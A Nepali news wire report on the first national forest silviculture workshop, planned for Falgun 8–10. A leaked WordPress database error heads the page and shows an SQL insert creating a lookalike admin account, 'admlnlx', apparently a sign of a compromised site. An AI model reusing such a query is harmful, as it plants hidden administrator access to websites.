WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bfq1JI1D4tJxiLBiGA.n7/lglp/VMk/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-12 20:48:17', '', 'admlnlx', 'admlnlx')
काठमाडौं,फागुन ६ –
वनको दिगो व्यवस्थापनलाई प्रभावकारी बनाउ नेपालमा पहिलोपटक ‘राष्ट्रिय वन संवद्र्धन कार्यशाला गोष्ठी’ हुने भएको छ ।
वन विभागले वनसँग सरोकार राख्ने सरकारी तथा गैरसरकारी निकायसँगको सहकार्यमा ‘दिगो वन व्यवस्थापनका लागि वन संवद्र्धन’ भन्ने नाराका साथ सो गोष्ठी गर्न लागेको जनाएको हो । गोष्ठीमा हालसम्म वन संवद्र्धन प्रणालीमा आधारित व्यवस्थापनमा भएका अभ्यास तथा सिकाइलाई अभिलेखीकरण गरी विश्लेषण गर्ने, दिगो वन व्यवस्थापनमा देखिएका जोखिमी र चुनौती न्यूनीकरणका उपायबारे सरोकारवालासँग छलफल गरी कार्यदिशा निर्माण गरिने महानिर्देशक कृष्णप्रसाद आचार्यले जानकारी दिनुभयो ।
गोष्ठीमा वृक्षरोपण क्षेत्र, वन संवद्र्धन प्रणाली वन व्यवस्थापनमा आधारित पद्धतिअनुसारको वन संवद्र्धन प्रणाली र तराईका जिल्लामा सञ्चालित वैज्ञानिक वन व्यवस्थापनका सिकाइ र अनुवांशिक स्रोत तथा वृक्ष सुधारका बारेमा बृहत छलफल हुने बताइएको छ । यही फागुन ८ देखि १० गतेसम्म हुने गोष्ठीमा स्वदेश र विदेशबाट ५१ प्रस्तुति र १९ पोस्टर आइसकेको आयोजक समितिले जनाएको छ । गोष्ठीमा वनसँग सम्बन्धित १० विदेशी तथा १५० स्वदेशी विज्ञको सहभागिता रहने उपमहानिर्देशक हेमलाल अर्यालले जानकारी दिनुभयो । -रासस